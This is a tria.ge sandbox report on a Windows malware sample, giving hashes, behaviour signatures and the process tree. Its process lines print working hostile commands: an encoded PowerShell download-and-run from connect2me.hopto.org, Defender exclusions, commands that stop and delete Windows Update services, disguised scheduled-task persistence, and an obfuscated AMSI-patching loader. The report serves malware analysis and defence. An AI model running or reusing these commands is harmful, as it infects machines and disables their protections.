Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
16/01/2023, 00:40
General
-
Target
17855519b9e1bde7cabf66a422b5671d4d462968.exe
-
Size
365KB
-
MD5
ee244310289c82ebe8c73cfd83329f49
-
SHA1
17855519b9e1bde7cabf66a422b5671d4d462968
-
SHA256
702c24cbf8634002b69a57efdbede5fa256b487e97f7d9272354fdae9c363d33
-
SHA512
20053cb845d1ef2845c85596f0d214b04fc8301cb783d8631ca8504af26706e78f046d691a65d1bd8fb9f15ff22e3136d5771f5a9394eb8d534afcc90f350d2b
-
SSDEEP
6144:xVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO19AjWbc:xRDF2BpjLQLsvBP0+ecyEY37CGP
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Stops running service(s) 3 TTPs
-
Drops startup file 1 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{15b1f8f6-2ff2-46cc-907a-519bf3c9e19b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"7⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 3123⤵
- Program crash
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:eWeaOgdfVQBO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aflNzVHGWgjtPW,[Parameter(Position=1)][Type]$SzyZOOuJDy)$NckIWEVLpjq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+'le'+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'ele'+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+'g'+'a'+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+'s'+'s'+','+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NckIWEVLpjq.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$NckIWEVLpjq.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'e'+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$SzyZOOuJDy,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $NckIWEVLpjq.CreateType();}$FiQVseZHmcrEQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](70)+''+[Char](105)+''+[Char](81)+''+[Char](86)+''+[Char](115)+''+[Char](101)+'ZHm'+[Char](99)+''+'r'+''+[Char](69)+''+[Char](81)+'');$tDKQEAecAKpDSk=$FiQVseZHmcrEQ.GetMethod('t'+[Char](68)+''+'K'+''+[Char](81)+''+[Char](69)+''+'A'+'e'+[Char](99)+''+'A'+''+[Char](75)+''+'p'+''+[Char](68)+''+'S'+''+[Char](107)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'tat'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lXUaFQdqAAQVbGRixsq=eWeaOgdfVQBO @([String])([IntPtr]);$LHRtmVjqTPAbpFqMwmfyjB=eWeaOgdfVQBO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jfspRDyfqCf=$FiQVseZHmcrEQ.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$SEFZsKozODJUll=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$nPGxHRUaehtPCFxHD=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$HintsWL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SEFZsKozODJUll,$lXUaFQdqAAQVbGRixsq).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$RKbcduaSFzIclxOFO=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$HintsWL,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$WNqtTcIiAS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,4,[ref]$WNqtTcIiAS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RKbcduaSFzIclxOFO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,0x20,[ref]$WNqtTcIiAS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+'s'+'t'+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ViwCWEanVVqb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EAAEmsKMTEgoCb,[Parameter(Position=1)][Type]$GhbKKLhkFZ)$xmRXvMlVtQr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$xmRXvMlVtQr.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');$xmRXvMlVtQr.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'B'+'y'+'S'+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$GhbKKLhkFZ,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $xmRXvMlVtQr.CreateType();}$usxCwMzOzvloc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+'32.U'+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](117)+''+[Char](115)+''+'x'+'C'+[Char](119)+''+[Char](77)+''+[Char](122)+'O'+[Char](122)+''+'v'+''+[Char](108)+''+[Char](111)+'c');$BoTDRYcMewqGUm=$usxCwMzOzvloc.GetMethod(''+[Char](66)+''+[Char](111)+''+[Char](84)+'D'+'R'+''+[Char](89)+''+[Char](99)+''+[Char](77)+''+[Char](101)+'wqG'+'U'+''+'m'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhzMlEZlNqCuLjVWETS=ViwCWEanVVqb @([String])([IntPtr]);$IgqvZrhmVfCNjmiwoWexoO=ViwCWEanVVqb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OWhIoSqESyC=$usxCwMzOzvloc.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$fCinQfxyStNAWR=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+'y'+'A')));$mKpNNihjYnyPDLdHF=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'rote'+'c'+'t')));$apmDBEg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fCinQfxyStNAWR,$FhzMlEZlNqCuLjVWETS).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$vXfuVoDkBepvCwzQl=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$apmDBEg,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$JwNxtdLprj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,4,[ref]$JwNxtdLprj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vXfuVoDkBepvCwzQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,0x20,[ref]$JwNxtdLprj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
